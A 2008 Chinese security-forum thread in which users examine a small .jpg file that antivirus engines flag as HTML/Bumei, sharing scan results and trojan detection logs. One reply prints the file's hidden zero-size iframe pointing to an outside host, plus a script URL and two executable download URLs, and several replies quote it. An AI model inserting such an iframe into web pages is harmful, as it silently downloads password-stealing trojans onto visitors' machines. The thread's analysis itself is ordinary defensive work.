逛網站時候紅傘抓的，懷疑誤報

llgiggs

ファイル名 589349_20081101640150588_1_.jpg 受理 2008.03.26 09:01:53 (CET)

アンチウイルス	バージョン	更新日	結果
AhnLab-V3	2008.3.26.0	2008.03.26	-
AntiVir	7.6.0.75	2008.03.26	HTML/Bumei
Authentium	4.93.8	2008.03.26	-
Avast	4.7.1098.0	2008.03.26	-
AVG	7.5.0.516	2008.03.25	-
BitDefender	7.2	2008.03.26	-
CAT-QuickHeal	9.50	2008.03.26	-
ClamAV	0.92.1	2008.03.25	-
DrWeb	4.44.0.09170	2008.03.26	-
eSafe	7.0.15.0	2008.03.18	-
eTrust-Vet	31.3.5644	2008.03.26	-
Ewido	4.0	2008.03.25	-
FileAdvisor	1	2008.03.26	-
Fortinet	3.14.0.0	2008.03.26	-
F-Prot	4.4.2.54	2008.03.25	-
F-Secure	6.70.13260.0	2008.03.26	-
Ikarus	T3.1.1.20	2008.03.26	HTML.Bumei
Kaspersky	7.0.0.125	2008.03.26	-
McAfee	5259	2008.03.25	-
Microsoft	1.3301	2008.03.26	-
NOD32v2	2973	2008.03.26	-
Norman	5.80.02	2008.03.25	-
Panda	9.0.0.4	2008.03.25	-
Prevx1	V2	2008.03.26	-
Rising	20.37.02.00	2008.03.24	-
Sophos	4.27.0	2008.03.26	-
Sunbelt	3.0.978.0	2008.03.18	-
Symantec	10	2008.03.26	-
TheHacker	6.2.92.255	2008.03.26	-
VBA32	3.12.6.3	2008.03.25	-
VirusBuster	4.3.26:9	2008.03.25	-
Webwasher-Gateway	6.6.2	2008.03.26	Script.Bumei
追加情報
File size: 771 bytes
MD5: 33162a86840ee00cae171447bfeaa0cd
SHA1: c599bd2bcaa378df90520723ac12962c46ffce65
PEiD: -

[ 本帖最后由 llgiggs 于 2008-3-26 18:46 编辑 ]

冷冷

样本呢

tanlimo

<iframe height=0 width=0 src="http://www.59.vc/page/add_531435.htm"></iframe>')

Log is generated by FreShow.
[wide]http://www.59.vc/page/add_531435.htm
    [script]http://www.59.vc/page/addr.js

http://w18.vg/s.exe
http://w18.vg/ss.exe

[ 本帖最后由 tanlimo 于 2008-3-26 19:03 编辑 ]

28654621

D:\download\589349_20081101640150588[1].zip>>589349_20081101640150588[1].jpg        JS.Decoder.u        病毒        还未处理

qigang

原帖由 tanlimo 于 2008-3-26 19:02 发表
')

Log is generated by FreShow.
[wide]http://www.59.vc/page/add_531435.htm
    [script]http://www.59.vc/page/addr.js

http://w18.vg/s.exe
http://w18.vg/ss.exe

老毒物，不更新！

leonfg

ESET
2008-03-26 22:17:50        HTTP filter        file        http://w18.vg/ss.exe        Win32/PSW.OnLineGames.NBR trojan        connection terminated - quarantined        CHINESE-GUNDAM\GUNDAM        Threat was detected upon access to web by the application: C:\Program Files\Mozilla Firefox\firefox.exe.
2008-03-26 22:17:42        HTTP filter        file        http://w18.vg/s.exe        Win32/TrojanDownloader.Tiny.Y trojan        connection terminated - quarantined        CHINESE-GUNDAM\GUNDAM        Threat was detected upon access to web by the application: C:\Program Files\Mozilla Firefox\firefox.exe.

qigang

原帖由 tanlimo 于 2008-3-26 19:02 发表
')

Log is generated by FreShow.
[wide]http://www.59.vc/page/add_531435.htm
    [script]http://www.59.vc/page/addr.js

http://w18.vg/s.exe
http://w18.vg/ss.exe

没有被挂这个呀。

sam.to

原帖由 tanlimo 于 2008-3-26 19:02 发表
')

Log is generated by FreShow.
[wide]http://www.59.vc/page/add_531435.htm
    [script]http://www.59.vc/page/addr.js

http://w18.vg/s.exe
http://w18.vg/ss.exe

14206937

红伞可能是误报了,红伞喜欢报这些东东的

sam.to

20081101640150588[1].jpgk - Exploit.HTML.Iframe.FileDownload.htmm,


New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.